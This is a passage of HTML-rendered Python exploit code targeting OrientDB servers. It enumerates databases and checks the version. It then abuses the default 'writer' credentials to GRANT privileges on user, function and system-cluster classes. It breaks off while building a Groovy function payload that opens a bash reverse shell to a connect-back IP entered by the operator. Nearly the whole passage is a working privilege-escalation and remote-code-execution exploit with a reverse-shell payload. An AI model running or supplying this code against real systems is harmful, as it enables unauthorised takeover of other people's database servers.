class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5967f204b10dc863783322-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print &quot;[+] Database Enumeration successful&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">database<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-k\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'databases'<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">database<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-31\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-33\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">check_version<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;2480&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;http:\/\/%s:%s\/listDatabases&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'server'<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print headers<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;2.2&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">headers <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;3.&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5967f204b10dc863783322-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-46\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">permission<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enum_databases<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-49\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-50\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;http:\/\/%s:%s\/command\/%s\/sql\/-\/20?format=rid,type,version,class,graph&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv_enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&quot;create&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;read&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;update&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;execute&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;delete&quot;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = &quot;GRANT create ON database.class.ouser TO writer&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-55\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">priv_enable<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">permission<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;GRANT&quot;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;GRANT %s ON %s TO writer&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">priv<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;REVOKE %s ON %s FROM writer&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">priv<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'writer'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">'writer'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-63\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">priv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;execute&quot;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;[+] %s&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-71\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-72\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv_escalation<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;2480&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-73\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;[+] Checking OrientDB Database version is greater than 2.2&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">check_version<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-77\">&nbsp;<\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;GRANT&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;database.class.ouser&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;Privilege Escalation done checking enabling operations on database.function&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;GRANT&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;database.function&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;Enabled functional operations on database.function&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;GRANT&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;database.systemclusters&quot;<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-s\">&#8220;Enabling access to system clusters&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv1 <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv2 <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">priv3<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-84\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-87\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2480&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = &#8216;&#8221;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;most&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8242;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:null&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-90\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;ost&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;whoami&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:None}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-92\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">random_function_name<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">func_name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-96\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-97\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enum_databases<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-98\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reverse_ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Enter the ip to connect back: &#8216;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
